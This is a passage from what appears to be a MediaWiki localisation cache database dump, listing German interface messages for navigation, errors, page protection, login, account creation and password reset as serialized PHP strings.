zu:\";'),('de','messages:jumptonavigation','s:10:\"Navigation\";'),('de','messages:jumptosearch','s:5:\"Suche\";'),('de','messages:view-pool-error','s:175:\"Entschuldigung, die Server sind im Moment überlastet.\nZu viele Benutzer versuchen, diese Seite zu besuchen.\nBitte warte einige Minuten, bevor du es noch einmal versuchst.\n\n$1\";'),('de','messages:generic-pool-error','s:149:\"Leider sind die Server derzeit überlastet.\nZu viele Benutzer wollen diese Ressource ansehen.\nBitte warte einen Moment, bevor du sie erneut aufrufst.\";'),('de','messages:pool-timeout','s:48:\"Zeitablauf während des Wartens auf die Sperrung\";'),('de','messages:pool-queuefull','s:26:\"Poolwarteschlange ist voll\";'),('de','messages:pool-errorunknown','s:18:\"Unbekannter Fehler\";'),('de','messages:pool-servererror','s:48:\"Der Poolzählerdienst ist nicht verfügbar ($1).\";'),('de','messages:aboutsite','s:18:\"Über {{SITENAME}}\";'),('de','messages:aboutpage','s:26:\"Project:Über_{{SITENAME}}\";'),('de','messages:copyright','s:77:\"Der Inhalt ist verfügbar unter der Lizenz $1, sofern nicht anders angegeben.\";'),('de','messages:copyrightpage','s:28:\"{{ns:project}}:Urheberrechte\";'),('de','messages:currentevents','s:19:\"Aktuelle Ereignisse\";'),('de','messages:currentevents-url','s:27:\"Project:Aktuelle Ereignisse\";'),('de','messages:disclaimers','s:9:\"Impressum\";'),('de','messages:disclaimerpage','s:17:\"Project:Impressum\";'),('de','messages:edithelp','s:17:\"Bearbeitungshilfe\";'),('de','messages:mainpage','s:10:\"Hauptseite\";'),('de','messages:mainpage-description','s:10:\"Hauptseite\";'),('de','messages:policy-url','s:19:\"Project:Richtlinien\";'),('de','messages:portal','s:19:\"Gemeinschaftsportal\";'),('de','messages:portal-url','s:27:\"Project:Gemeinschaftsportal\";'),('de','messages:privacy','s:11:\"Datenschutz\";'),('de','messages:privacypage','s:19:\"Project:Datenschutz\";'),('de','messages:badaccess','s:34:\"Keine ausreichenden Benutzerrechte\";'),('de','messages:badaccess-group0','s:66:\"Du hast nicht die erforderlichen Benutzerrechte für diese Aktion.\";'),('de','messages:badaccess-groups','s:110:\"Diese Aktion ist auf Benutzer beschränkt, die {{PLURAL:$2|der Gruppe|einer der Gruppen}} „$1“ angehören.\";'),('de','messages:versionrequired','s:42:\"Version $1 von MediaWiki ist erforderlich.\";'),('de','messages:versionrequiredtext','s:112:\"Version $1 von MediaWiki ist erforderlich, um diese Seite zu nutzen.\nSiehe die [[Special:Version|Versionsseite]]\";'),('de','messages:ok','s:4:\"Okay\";'),('de','messages:pagetitle','s:19:\"$1 – {{SITENAME}}\";'),('de','messages:retrievedfrom','s:12:\"Von „$1“\";'),('de','messages:youhavenewmessages','s:16:\"Du hast $1 ($2).\";'),('de','messages:youhavenewmessagesfromusers','s:70:\"Du hast $1 von {{PLURAL:$3|einem anderen Benutzer|$3 Benutzern}} ($2).\";'),('de','messages:youhavenewmessagesmanyusers','s:37:\"Du hast $1 von vielen Benutzern ($2).\";'),('de','messages:newmessageslinkplural','s:54:\"{{PLURAL:$1|eine neue Nachricht|999=neue Nachrichten}}\";'),('de','messages:newmessagesdifflinkplural','s:46:\"letzte {{PLURAL:$1|Änderung|999=Änderungen}}\";'),('de','messages:youhavenewmessagesmulti','s:28:\"Du hast neue Nachrichten: $1\";'),('de','messages:editsection','s:10:\"Bearbeiten\";'),('de','messages:editold','s:10:\"Bearbeiten\";'),('de','messages:viewsourceold','s:18:\"Quelltext anzeigen\";'),('de','messages:editlink','s:10:\"bearbeiten\";'),('de','messages:viewsourcelink','s:18:\"Quelltext anzeigen\";'),('de','messages:editsectionhint','s:24:\"Abschnitt bearbeiten: $1\";'),('de','messages:toc','s:18:\"Inhaltsverzeichnis\";'),('de','messages:showtoc','s:8:\"Anzeigen\";'),('de','messages:hidetoc','s:9:\"Verbergen\";'),('de','messages:collapsible-collapse','s:10:\"Einklappen\";'),('de','messages:collapsible-expand','s:10:\"Ausklappen\";'),('de','messages:confirmable-confirm','s:29:\"Bist {{GENDER:$1|du}} sicher?\";'),('de','messages:confirmable-yes','s:2:\"Ja\";'),('de','messages:confirmable-no','s:4:\"Nein\";'),('de','messages:thisisdeleted','s:33:\"$1 ansehen oder wiederherstellen?\";'),('de','messages:viewdeleted','s:12:\"$1 anzeigen?\";'),('de','messages:restorelink','s:56:\"$1 {{PLURAL:$1|gelöschte Version|gelöschte Versionen}}\";'),('de','messages:feedlinks','s:5:\"Feed:\";'),('de','messages:feed-invalid','s:32:\"Ungültiger Feed-Abonnement-Typ.\";'),('de','messages:feed-unavailable','s:37:\"Es stehen keine Feeds zur Verfügung.\";'),('de','messages:site-rss-feed','s:22:\"RSS-Feed für „$1“\";'),('de','messages:site-atom-feed','s:23:\"Atom-Feed für „$1“\";'),('de','messages:page-rss-feed','s:22:\"RSS-Feed für „$1“\";'),('de','messages:page-atom-feed','s:23:\"Atom-Feed für „$1“\";'),('de','messages:red-link-title','s:26:\"$1 (Seite nicht vorhanden)\";'),('de','messages:sort-descending','s:20:\"Absteigend sortieren\";'),('de','messages:sort-ascending','s:21:\"Aufsteigend sortieren\";'),('de','messages:nstab-main','s:5:\"Seite\";'),('de','messages:nstab-user','s:13:\"Benutzerseite\";'),('de','messages:nstab-media','s:11:\"Medienseite\";'),('de','messages:nstab-special','s:12:\"Spezialseite\";'),('de','messages:nstab-project','s:12:\"Projektseite\";'),('de','messages:nstab-image','s:5:\"Datei\";'),('de','messages:nstab-mediawiki','s:15:\"Systemnachricht\";'),('de','messages:nstab-template','s:7:\"Vorlage\";'),('de','messages:nstab-help','s:10:\"Hilfeseite\";'),('de','messages:nstab-category','s:9:\"Kategorie\";'),('de','messages:nosuchaction','s:26:\"Diese Aktion gibt es nicht\";'),('de','messages:nosuchactiontext','s:272:\"Die in der URL angegebene Aktion wird von MediaWiki nicht unterstützt.\nEs kann ein Schreibfehler in der URL vorliegen oder es wurde ein fehlerhafter Link angeklickt.\nEs kann sich auch um einen Programmierfehler in der Software, die von {{SITENAME}} benutzt wird, handeln.\";'),('de','messages:nosuchspecialpage','s:28:\"Spezialseite nicht vorhanden\";'),('de','messages:nospecialpagetext','s:171:\"Die aufgerufene Spezialseite ist nicht vorhanden.\n\nAlle verfügbaren Spezialseiten sind in der [[Special:SpecialPages|Liste der Spezialseiten]] zu finden.\";'),('de','messages:error','s:6:\"Fehler\";'),('de','messages:databaseerror','s:15:\"Datenbankfehler\";'),('de','messages:databaseerror-text','s:103:\"Es ist ein Datenbankabfragefehler aufgetreten.\nDies könnte auf einen Fehler in der Software hindeuten.\";'),('de','messages:databaseerror-textcl','s:46:\"Es ist ein Datenbankabfragefehler aufgetreten.\";'),('de','messages:databaseerror-query','s:11:\"Abfrage: $1\";'),('de','messages:databaseerror-function','s:12:\"Funktion: $1\";'),('de','messages:databaseerror-error','s:10:\"Fehler: $1\";'),('de','messages:laggedslavemode','s:114:\"Achtung: Die angezeigte Seite könnte unter Umständen nicht die letzten Bearbeitungen enthalten.\";'),('de','messages:readonly','s:18:\"Datenbank gesperrt\";'),('de','messages:enterlockreason','s:118:\"Bitte gib einen Grund ein, warum die Datenbank gesperrt werden soll und eine Abschätzung über die Dauer der Sperrung\";'),('de','messages:readonlytext','s:139:\"Die Datenbank ist vorübergehend für Neueinträge und Änderungen gesperrt. Bitte versuche es später noch einmal.\n\nGrund der Sperrung: $1\";'),('de','messages:missing-article','s:302:\"Der Text von „$1“ $2 wurde nicht in der Datenbank gefunden.\n\nDie Seite ist möglicherweise gelöscht oder verschoben worden.\n\nFalls dies nicht zutrifft, hast du eventuell einen Fehler in der Software gefunden. Bitte melde dies einem [[Special:ListUsers/sysop|Administrator]] unter Nennung der URL.\";'),('de','messages:missingarticle-rev','s:20:\"(Versionsnummer: $1)\";'),('de','messages:missingarticle-diff','s:40:\"(Unterschied zwischen Versionen: $1, $2)\";'),('de','messages:readonly_lag','s:171:\"Die Datenbank wurde automatisch für Schreibzugriffe gesperrt, damit sich die verteilten Datenbankserver (slaves) mit dem Hauptdatenbankserver (master) abgleichen können.\";'),('de','messages:internalerror','s:15:\"Interner Fehler\";'),('de','messages:internalerror_info','s:19:\"Interner Fehler: $1\";'),('de','messages:filecopyerror','s:61:\"Die Datei „$1“ konnte nicht nach „$2“ kopiert werden.\";'),('de','messages:filerenameerror','s:63:\"Die Datei „$1“ konnte nicht nach „$2“ umbenannt werden.\";'),('de','messages:filedeleteerror','s:49:\"Die Datei „$1“ konnte nicht gelöscht werden.\";'),('de','messages:directorycreateerror','s:54:\"Das Verzeichnis „$1“ konnte nicht angelegt werden.\";'),('de','messages:filenotfound','s:40:\"Die Datei „$1“ wurde nicht gefunden.\";'),('de','messages:unexpected','s:38:\"Unerwarteter Wert: „$1“ = „$2“\";'),('de','messages:formerror','s:54:\"Fehler: Die Eingaben konnten nicht verarbeitet werden.\";'),('de','messages:badarticleerror','s:58:\"Diese Aktion kann auf diese Seite nicht angewendet werden.\";'),('de','messages:cannotdelete','s:124:\"Die Seite oder Datei „$1“ konnte nicht gelöscht werden.\nMöglicherweise wurde sie bereits von jemand anderem gelöscht.\";'),('de','messages:cannotdelete-title','s:42:\"Seite „$1“ kann nicht gelöscht werden\";'),('de','messages:delete-hook-aborted','s:117:\"Die Löschung wurde von einer Programmerweiterung zu MediaWiki verhindert.\nEs ist hierzu keine Erklärung verfügbar.\";'),('de','messages:no-null-revision','s:73:\"Die neue Nullversion für die Seite „$1“ konnte nicht erstellt werden\";'),('de','messages:badtitle','s:17:\"Ungültiger Titel\";'),('de','messages:badtitletext','s:109:\"Der Titel der angeforderten Seite ist ungültig, leer oder ein ungültiger Sprachlink von einem anderen Wiki.\";'),('de','messages:perfcached','s:160:\"Die folgenden Daten stammen aus dem Cache und sind möglicherweise nicht aktuell. Maximal {{PLURAL:$1|ein Ergebnis ist|$1 Ergebnisse sind}} im Cache verfügbar.\";'),('de','messages:perfcachedts','s:167:\"Diese Daten stammen aus dem Cache. Der Zeitpunkt der letzten Aktualisierung: $2, $3 Uhr. Maximal {{PLURAL:$4|ein Ergebnis ist|$4 Ergebnisse sind}} im Cache verfügbar.\";'),('de','messages:querypage-no-updates','s:115:\"Die Aktualisierungsfunktion dieser Seite ist zurzeit deaktiviert.\nDie Daten werden bis auf Weiteres nicht erneuert.\";'),('de','messages:viewsource','s:18:\"Quelltext anzeigen\";'),('de','messages:viewsource-title','s:22:\"Quelltext der Seite $1\";'),('de','messages:actionthrottled','s:23:\"Aktionsanzahl limitiert\";'),('de','messages:actionthrottledtext','s:201:\"Im Rahmen einer Anti-Spam-Maßnahme kann diese Aktion in einem kurzen Zeitabstand nur begrenzt oft ausgeführt werden. Diese Grenze hast du überschritten.\nBitte versuche es in ein paar Minuten erneut.\";'),('de','messages:protectedpagetext','s:83:\"Diese Seite wurde geschützt, um Bearbeitungen sowie andere Aktionen zu verhindern.\";'),('de','messages:viewsourcetext','s:61:\"Du kannst den Quelltext dieser Seite betrachten und kopieren:\";'),('de','messages:viewyourtext','s:86:\"Du kannst den Quelltext \'\'\'deiner Bearbeitung\'\'\' dieser Seite betrachten und kopieren:\";'),('de','messages:protectedinterface','s:290:\"Diese Seite enthält Text für die Benutzeroberfläche der Software auf diesem Wiki und ist geschützt, um Missbrauch vorzubeugen.\nNutze bitte [//translatewiki.net/ translatewiki.net], das Lokalisierungsprojekt von MediaWiki, um Übersetzungen für alle Wikis hinzuzufügen oder zu ändern.\";'),('de','messages:editinginterface','s:325:\"\'\'\'Warnung:\'\'\' Diese Seite enthält von der MediaWiki-Software genutzten Text.\nÄnderungen auf dieser Seite wirken sich auf die Benutzeroberfläche dieses Wikis aus.\nNutze bitte [//translatewiki.net/ translatewiki.net], das Lokalisierungsprojekt von MediaWiki, um Übersetzungen für alle Wikis hinzuzufügen oder zu ändern.\";'),('de','messages:cascadeprotected','s:189:\"Diese Seite ist zur Bearbeitung gesperrt. Sie ist in die {{PLURAL:$1|folgende Seite|folgenden Seiten}} eingebunden, die mittels der Kaskadensperroption geschützt {{PLURAL:$1|ist|sind}}:\n$2\";'),('de','messages:namespaceprotected','s:101:\"Du hast nicht die erforderliche Berechtigung, um Seiten im Namensraum \'\'\'$1\'\'\' bearbeiten zu können.\";'),('de','messages:customcssprotected','s:147:\"Du hast nicht die Berechtigung, diese CSS enthaltende Seite zu bearbeiten, da sie die persönlichen Einstellungen eines anderen Benutzers enthält.\";'),('de','messages:customjsprotected','s:168:\"Du hast nicht die Berechtigung, diese JavaScript enthaltende Seite zu bearbeiten, da es sich hierbei um die persönlichen Einstellungen eines anderen Benutzers handelt.\";'),('de','messages:mycustomcssprotected','s:58:\"Du hast keine Berechtigung, diese CSS-Seite zu bearbeiten.\";'),('de','messages:mycustomjsprotected','s:65:\"Du hast keine Berechtigung, diese JavaScript-Seite zu bearbeiten.\";'),('de','messages:myprivateinfoprotected','s:71:\"Du hast keine Berechtigung, deine privaten Informationen zu bearbeiten.\";'),('de','messages:mypreferencesprotected','s:62:\"Du hast keine Berechtigung, deine Einstellungen zu bearbeiten.\";'),('de','messages:ns-specialprotected','s:46:\"Spezialseiten können nicht bearbeitet werden.\";'),('de','messages:titleprotected','s:145:\"Eine Seite mit diesem Namen kann nicht angelegt werden.\nDie Sperre wurde durch [[User:$1|$1]] mit der Begründung „$2“ eingerichtet.\";'),('de','messages:filereadonlyerror','s:202:\"Die Datei „$1“ kann nicht verändert werden, da auf das Dateirepositorium „$2“ nur Lesezugriff möglich ist.\n\nDer Administrator, der den Schreibzugriff sperrte, gab folgenden Grund an: „$3“.\";'),('de','messages:invalidtitle-knownnamespace','s:59:\"Ungültiger Titel mit Namensraum „$2“ und Text „$3“\";'),('de','messages:invalidtitle-unknownnamespace','s:71:\"Ungültiger Titel mit unbekannter Namensraumnummer $1 und Text „$2“\";'),('de','messages:exception-nologin','s:16:\"Nicht angemeldet\";'),('de','messages:exception-nologin-text','s:76:\"Du musst dich anmelden, um auf diese Seite oder Aktion zugreifen zu können.\";'),('de','messages:exception-nologin-text-manual','s:70:\"Du musst dich $1, um auf diese Seite oder Aktion zugreifen zu können.\";'),('de','messages:virus-badscanner','s:64:\"Fehlerhafte Konfiguration: unbekannter Virenscanner: $1\";'),('de','messages:virus-scanfailed','s:29:\"Scan fehlgeschlagen (code $1)\";'),('de','messages:virus-unknownscanner','s:25:\"Unbekannter Virenscanner:\";'),('de','messages:logouttext','s:168:\"Du bist nun abgemeldet.\n\nBeachte, dass einige Seiten noch anzeigen können, dass du angemeldet bist, solange du nicht deinen Browsercache geleert hast.\";'),('de','messages:welcomeuser','s:15:\"Willkommen, $1!\";'),('de','messages:welcomecreation-msg','s:118:\"Dein Benutzerkonto wurde erstellt.\nVergiss nicht, deine [[Special:Preferences|{{SITENAME}}-Einstellungen]] zu ändern.\";'),('de','messages:yourname','s:13:\"Benutzername:\";'),('de','messages:userlogin-yourname','s:12:\"Benutzername\";'),('de','messages:userlogin-yourname-ph','s:28:\"Gib deinen Benutzernamen ein\";'),('de','messages:createacct-another-username-ph','s:12:\"Benutzername\";'),('de','messages:yourpassword','s:9:\"Passwort:\";'),('de','messages:userlogin-yourpassword','s:8:\"Passwort\";'),('de','messages:userlogin-yourpassword-ph','s:21:\"Gib dein Passwort ein\";'),('de','messages:createacct-yourpassword-ph','s:21:\"Gib dein Passwort ein\";'),('de','messages:yourpasswordagain','s:21:\"Passwort wiederholen:\";'),('de','messages:createacct-yourpasswordagain','s:20:\"Passwort bestätigen\";'),('de','messages:createacct-yourpasswordagain-ph','s:27:\"Gib das Passwort erneut ein\";'),('de','messages:remembermypassword','s:83:\"Mit diesem Browser dauerhaft angemeldet bleiben (maximal $1 {{PLURAL:$1|Tag|Tage}})\";'),('de','messages:userlogin-remembermypassword','s:18:\"Angemeldet bleiben\";'),('de','messages:userlogin-signwithsecure','s:28:\"Sichere Verbindung verwenden\";'),('de','messages:yourdomainname','s:13:\"Deine Domain:\";'),('de','messages:password-change-forbidden','s:52:\"Du kannst auf diesem Wiki keine Passwörter ändern.\";'),('de','messages:externaldberror','s:128:\"Entweder liegt ein Fehler bei der externen Authentifizierung vor oder du darfst dein externes Benutzerkonto nicht aktualisieren.\";'),('de','messages:login','s:8:\"Anmelden\";'),('de','messages:nav-login-createaccount','s:34:\"Anmelden / Benutzerkonto erstellen\";'),('de','messages:userlogin','s:32:\"Anmelden / Benutzerkonto anlegen\";'),('de','messages:userloginnocreate','s:8:\"Anmelden\";'),('de','messages:logout','s:8:\"Abmelden\";'),('de','messages:userlogout','s:8:\"Abmelden\";'),('de','messages:notloggedin','s:16:\"Nicht angemeldet\";'),('de','messages:userlogin-noaccount','s:32:\"Du hast noch kein Benutzerkonto?\";'),('de','messages:userlogin-joinproject','s:25:\"Bei {{SITENAME}} anmelden\";'),('de','messages:nologin','s:31:\"Du hast kein Benutzerkonto? $1.\";'),('de','messages:nologinlink','s:27:\"Neues Benutzerkonto anlegen\";'),('de','messages:createaccount','s:21:\"Benutzerkonto anlegen\";'),('de','messages:gotaccount','s:38:\"Du hast bereits ein Benutzerkonto? $1.\";'),('de','messages:gotaccountlink','s:8:\"Anmelden\";'),('de','messages:userlogin-resetlink','s:27:\"Die Anmeldedaten vergessen?\";'),('de','messages:userlogin-resetpassword-link','s:19:\"Passwort vergessen?\";'),('de','messages:userlogin-helplink2','s:19:\"Hilfe beim Anmelden\";'),('de','messages:createacct-emailrequired','s:14:\"E-Mail-Adresse\";'),('de','messages:createacct-emailoptional','s:25:\"E-Mail-Adresse (optional)\";'),('de','messages:createacct-email-ph','s:28:\"Gib deine E-Mail-Adresse ein\";'),('de','messages:createacct-another-email-ph','s:14:\"E-Mail-Adresse\";'),('de','messages:createaccountmail','s:88:\"Ein temporäres Zufallspasswort verwenden und an die angegebene E-Mail-Adresse versenden\";'),('de','messages:createacct-realname','s:29:\"Bürgerlicher Name (optional)\";'),('de','messages:createaccountreason','s:6:\"Grund:\";'),('de','messages:createacct-reason','s:11:\"Begründung\";'),('de','messages:createacct-reason-ph','s:45:\"Warum erstellst du ein anderes Benutzerkonto?\";'),('de','messages:createacct-captcha','s:19:\"Sicherheitsprüfung\";'),('de','messages:createacct-imgcaptcha-ph','s:37:\"Gib den Text ein, den du oben siehst.\";'),('de','messages:createacct-submit','s:23:\"Benutzerkonto erstellen\";'),('de','messages:createacct-another-submit','s:31:\"Anderes Benutzerkonto erstellen\";'),('de','messages:createacct-benefit-heading','s:50:\"{{SITENAME}} wird von Menschen wie dir geschaffen.\";'),('de','messages:createacct-benefit-body1','s:39:\"{{PLURAL:$1|Bearbeitung|Bearbeitungen}}\";'),('de','messages:createacct-benefit-body2','s:26:\"{{PLURAL:$1|Seite|Seiten}}\";'),('de','messages:createacct-benefit-body3','s:42:\"{{PLURAL:$1|aktiver Autor|aktive Autoren}}\";'),('de','messages:badretype','s:46:\"Die beiden Passwörter stimmen nicht überein.\";'),('de','messages:userexists','s:67:\"Dieser Benutzername ist schon vergeben.\nBitte wähle einen anderen.\";'),('de','messages:loginerror','s:24:\"Fehler bei der Anmeldung\";'),('de','messages:createacct-error','s:40:\"Fehler beim Erstellen des Benutzerkontos\";'),('de','messages:createaccounterror','s:46:\"Benutzerkonto konnte nicht erstellt werden: $1\";'),('de','messages:nocookiesnew','s:224:\"Der Benutzerzugang wurde erstellt, aber du bist nicht angemeldet. {{SITENAME}} benötigt für diese Funktion Cookies, bitte aktiviere diese und melde dich dann mit deinem neuen Benutzernamen und dem zugehörigen Passwort an.\";'),('de','messages:nocookieslogin','s:131:\"{{SITENAME}} benutzt Cookies zur Anmeldung der Benutzer. Du hast Cookies deaktiviert, bitte aktiviere diese und versuche es erneut.\";'),('de','messages:nocookiesfornew','s:204:\"Das Benutzerkonto wurde nicht erstellt, da die Datenherkunft nicht ermittelt werden konnte.\nBitte stelle sicher, dass du Cookies aktiviert hast. Lade diese Seite danach erneut und versuche es noch einmal.\";'),('de','messages:noname','s:47:\"Du musst einen gültigen Benutzernamen angeben.\";'),('de','messages:loginsuccesstitle','s:21:\"Anmeldung erfolgreich\";'),('de','messages:loginsuccess','s:72:\"Du bist jetzt als „$1“ bei {{SITENAME}} angemeldet.\";'),('de','messages:nosuchuser','s:172:\"Der Benutzername „$1“ existiert nicht.\nÜberprüfe die Schreibweise (Groß-/Kleinschreibung beachten) oder [[Special:UserLogin/signup|lege ein neues Benutzerkonto an]].\";'),('de','messages:nosuchusershort','s:82:\"Der Benutzername „$1“ ist nicht vorhanden. Bitte überprüfe die Schreibweise.\";'),('de','messages:nouserspecified','s:33:\"Bitte gib einen Benutzernamen an.\";'),('de','messages:login-userblocked','s:109:\"{{GENDER:$1|Dieser Benutzer|Diese Benutzerin|Dieser Benutzer}} ist gesperrt. Die Anmeldung ist nicht erlaubt.\";'),('de','messages:wrongpassword','s:50:\"Das Passwort ist falsch. Bitte versuche es erneut.\";'),('de','messages:wrongpasswordempty','s:60:\"Es wurde kein Passwort eingegeben. Bitte versuche es erneut.\";'),('de','messages:passwordtooshort','s:76:\"Passwörter müssen mindestens {{PLURAL:$1|1 Zeichen|$1 Zeichen}} lang sein.\";'),('de','messages:password-name-match','s:63:\"Dein Passwort muss sich von deinem Benutzernamen unterscheiden.\";'),('de','messages:password-login-forbidden','s:70:\"Die Verwendung dieses Benutzernamens und Passwortes ist nicht erlaubt.\";'),('de','messages:mailmypassword','s:22:\"Passwort zurücksetzen\";'),('de','messages:passwordremindertitle','s:51:\"Neues Passwort für dein {{SITENAME}}-Benutzerkonto\";'),('de','messages:passwordremindertext','s:484:\"Jemand mit der IP-Adresse $1, wahrscheinlich du selbst, hat ein neues Passwort für die Anmeldung bei {{SITENAME}} ($4) angefordert.\n\nDas automatisch generierte Passwort für Benutzer „$2“ lautet nun: $3\n\nFalls du dies wirklich gewünscht hast, solltest du dich jetzt anmelden und das Passwort ändern.\nDas neue Passwort ist {{PLURAL:$5|1 Tag|$5 Tage}} gültig.\n\nBitte ignoriere diese E-Mail, falls du sie nicht selbst angefordert hast. Das alte Passwort bleibt weiterhin gültig.\";'),('de','messages:noemail','s:87:\"{{GENDER:$1|Benutzer|Benutzerin|Benutzer}} „$1“ hat keine E-Mail-Adresse angegeben.\";'),('de','messages:noemailcreate','s:46:\"Du musst eine gültige E-Mail-Adresse angeben.\";'),('de','messages:passwordsent','s:189:\"Ein neues, temporäres Passwort wurde an die E-Mail-Adresse von Benutzer „$1“ gesandt.\nBitte melde dich damit an, sobald du es erhalten hast. Das alte Passwort bleibt weiterhin gültig.\";'),('de','messages:blocked-mailpassword','s:192:\"Die von dir verwendete IP-Adresse ist für das Ändern von Seiten gesperrt. Um einen Missbrauch zu verhindern, wurde die Möglichkeit zur Anforderung eines neuen Passwortes ebenfalls gesperrt.\";'),('de','messages:eauthentsent','s:318:\"Eine Bestätigungs-E-Mail wurde an die angegebene Adresse verschickt.\n\nBevor eine E-Mail von anderen Benutzern über die E-Mail-Funktion empfangen werden kann, muss die Adresse und ihre tatsächliche Zugehörigkeit zu diesem Benutzerkonto erst bestätigt werden. Bitte befolge die Hinweise in der Bestätigungs-E-Mail.\";'),('de','messages:throttled-mailpassword','s:280:\"Es wurde innerhalb der letzten {{PLURAL:$1|Stunde|$1 Stunden}} bereits eine Passwortzurücksetzungs-E-Mail angefordert. Um einen Missbrauch der Funktion zu verhindern, kann nur {{PLURAL:$1|einmal pro Stunde|alle $1 Stunden}} eine Passwortzurücksetzungs-E-Mail angefordert werden.\";'),('de','messages:mailerror','s:33:\"Fehler beim Senden der E-Mail: $1\";'),('de','messages:acct_creation_throttle_hit','s:302:\"Besucher dieses Wikis, die deine IP-Adresse verwenden, haben innerhalb des letzten Tages {{PLURAL:$1|1 Benutzerkonto|$1 Benutzerkonten}} erstellt, was die maximal erlaubte Anzahl in dieser Zeitperiode ist.\n\nBesucher, die diese IP-Adresse verwenden, können momentan keine Benutzerkonten mehr erstellen.\";'),('de','messages:emailauthenticated','s:54:\"Deine E-Mail-Adresse wurde am $2 um $3 Uhr bestätigt.\";'),('de','messages:emailnotauthenticated','s:139:\"Deine E-Mail-Adresse ist noch nicht bestätigt.\nDie folgenden E-Mail-Funktionen stehen erst nach erfolgreicher Bestätigung zur Verfügung.\";'),('de','messages:noemailprefs','s:106:\"Gib eine E-Mail-Adresse in den Einstellungen an, damit die nachfolgenden Funktionen zur Verfügung stehen.\";'),('de','messages:emailconfirmlink','s:46:\"E-Mail-Adresse bestätigen (authentifizieren).\";'),('de','messages:invalidemailaddress','s:179:\"Die E-Mail-Adresse wird nicht akzeptiert, weil sie ein ungültiges Format (eventuell ungültige Zeichen) zu haben scheint. Bitte gib eine korrekte Adresse ein oder leere das Feld.\";'),('de','messages:cannotchangeemail','s:62:\"E-Mail-Adressen können in diesem Wiki nicht geändert werden.\";'),('de','messages:emaildisabled','s:58:\"Über diese Website können keine E-Mails versandt werden.\";'),('de','messages:accountcreated','s:22:\"Benutzerkonto erstellt\";'),('de','messages:accountcreatedtext','s:101:\"Das Benutzerkonto für [[{{ns:User}}:$1|$1]] ([[{{ns:User talk}}:$1|Diskussion]]) wurde eingerichtet.\";'),('de','messages:createaccount-title','s:49:\"Erstellung eines Benutzerkontos für {{SITENAME}}\";'),('de','messages:createaccount-text','s:288:\"Es wurde für dich ein Benutzerkonto „$2“ auf {{SITENAME}} ($4) erstellt. Das automatisch generierte Passwort für „$2“ ist „$3“. Du solltest dich nun anmelden und das Passwort ändern.\n\nFalls das Benutzerkonto irrtümlich angelegt wurde, kannst du diese Nachricht ignorieren.\";'),('de','messages:login-throttled','s:87:\"Du hast zu oft versucht, dich anzumelden.\nBitte warte $1, bevor du es erneut probierst.\";'),('de','messages:login-abort-generic','s:53:\"Deine Anmeldung war nicht erfolgreich – Abgebrochen\";'),('de','messages:login-migrated-generic','s:94:\"Dein Benutzerkonto wurde migriert. Dein Benutzername ist auf diesem Wiki nicht mehr vorhanden.\";'),('de','messages:loginlanguagelabel','s:11:\"Sprache: $1\";'),('de','messages:suspicious-userlogout','s:122:\"Deine Abmeldeanfrage wurde verweigert, da sie vermutlich von einem defekten Browser oder einem Cache-Proxy gesendet wurde.\";'),('de','messages:createacct-another-realname-tip','s:108:\"Der bürgerliche Name ist optional.\nWenn du ihn angibst, wird er für die Zuordnung der Beiträge verwendet.\";'),('de','messages:pt-login','s:8:\"Anmelden\";'),('de','messages:pt-login-button','s:8:\"Anmelden\";'),('de','messages:pt-createaccount','s:23:\"Benutzerkonto erstellen\";'),('de','messages:pt-userlogout','s:8:\"Abmelden\";'),('de','messages:php-mail-error-unknown','s:46:\"Unbekannter Fehler in der PHP-Funktion mail().\";'),('de','messages:user-mail-no-addy','s:77:\"Es wurde versucht, eine E-Mail ohne Angabe einer E-Mail-Adresse zu versenden.\";'),('de','messages:user-mail-no-body','s:88:\"Es wurde versucht, eine E-Mail mit einem leeren oder zu kurzen Textkörper zu versenden.\";'),('de','messages:changepassword','s:16:\"Passwort ändern\";'),('de','messages:resetpass_announce','s:71:\"Um die Anmeldung abzuschließen, musst du ein neues Passwort festlegen.\";'),('de','messages:resetpass_text','s:31:\"\";'),('de','messages:resetpass_header','s:16:\"Passwort ändern\";'),('de','messages:oldpassword','s:15:\"Altes Passwort:\";'),('de','messages:newpassword','s:15:\"Neues Passwort:\";'),('de','messages:retypenew','s:25:\"Neues Passwort (nochmal):\";'),('de','messages:resetpass_submit','s:34:\"Passwort übermitteln und anmelden\";'),('de','messages:changepassword-success','s:42:\"Dein Passwort wurde erfolgreich geändert!\";'),('de','messages:changepassword-throttled','s:101:\"Du hast kürzlich zu viele Anmeldeversuche unternommen.\nBitte warte $1, bevor du es erneut versuchst.\";'),('de','messages:resetpass_forbidden','s:41:\"Das Passwort kann nicht geändert werden.\";'),('de','messages:resetpass-no-info','s:62:\"Du musst dich anmelden, um auf diese Seite direkt zuzugreifen.\";'),('de','messages:resetpass-submit-loggedin','s:16:\"Passwort ändern\";'),('de','messages:resetpass-submit-cancel','s:9:\"Abbrechen\";'),('de','messages:resetpass-wrong-oldpass','s:163:\"Ungültiges temporäres oder aktuelles Passwort.\nMöglicherweise hast du dein Passwort bereits erfolgreich geändert oder ein neues temporäres Passwort beantragt.\";'),('de','messages:resetpass-recycled','s:75:\"Bitte setze dein Passwort auf ein anderes Passwort als dein aktuelles fest.\";'),('de','messages:resetpass-temp-emailed','s:136:\"Du hast dich mit einem temporären E-Mail-Code angemeldet.\nUm die Anmeldung abzuschließen, musst du jetzt ein neues Passwort festlegen:\";'),('de','messages:resetpass-temp-password','s:21:\"Temporäres Passwort:\";'),('de','messages:resetpass-abort-generic','s:63:\"Die Passwortänderung wurde durch eine Erweiterung abgebrochen.\";'),('de','messages:resetpass-expired','s:79:\"Dein Passwort ist abgelaufen. Bitte lege ein neues Passwort zur Anmeldung fest.\";'),('de','messages:resetpass-expired-soft','s:188:\"Dein Passwort ist abgelaufen und muss zurückgesetzt werden. Bitte wähle jetzt ein neues Passwort aus oder klicke auf „{{int:resetpass-submit-cancel}}“, um es später zurückzusetzen.\";'),('de','messages:resetpass-validity-soft','s:160:\"Dein Passwort ist nicht gültig: $1\n\nBitte wähle jetzt ein neues Passwort oder klicke auf „{{int:resetpass-submit-cancel}}“, um es später zurückzusetzen.\";'),('de','messages:passwordreset','s:22:\"Passwort zurücksetzen\";'),('de','messages:passwordreset-text-one','s:61:\"Fülle dieses Formular aus, um dein Passwort zurückzusetzen.\";'),('de','messages:passwordreset-text-many','s:103:\"{{PLURAL:$1|Füll eines der Felder aus, um ein temporäres Passwort per E-Mail zugesandt zu bekommen.}}\";'),('de','messages:passwordreset-legend','s:22:\"Passwort zurücksetzen\";'),('de','messages:passwordreset-disabled','s:68:\"Das Zurücksetzen von Passwörtern wurde in diesem Wiki 